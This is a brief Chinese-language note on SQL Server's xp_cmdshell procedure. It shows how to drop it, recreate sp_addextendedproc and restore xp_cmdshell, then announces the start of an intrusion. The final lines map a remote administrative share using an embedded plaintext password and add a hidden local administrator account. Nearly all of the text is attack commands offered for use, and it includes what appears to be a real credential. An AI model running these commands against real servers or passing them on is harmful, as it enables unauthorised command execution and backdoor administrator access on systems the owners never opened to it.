--查询此过程的dll
sp_helpextendedproc xp_cmdshell
删除相关控制台命令
--删除xp_cmdshell控制台
EXEC sp_dropextendedproc 'xp_cmdshell'
--删除sp_addextendedproc附加函数
DROP PROCEDURE sp_addextendedproc
附加回相关控制台命令
--恢复sp_addextendedproc附加函数
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
--恢复xp_cmdshell控制台
EXEC sp_addextendedproc 'xp_cmdshell' ,'xplog70.dll'
--dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 备用恢复xp_cmdshell控制台,这样可以直接恢复,不用去管sp_addextendedproc是不是存在
准备工作做好后,开始入侵
--'net use z: \\192.168.2.206\F$ "barefoot321+-*" /user:192.168.2.206\barefootadmin' --添加一个影射
'net user xiao xiao /add & net localgroup administrators xiao /add' --添加一个高级管理员用户
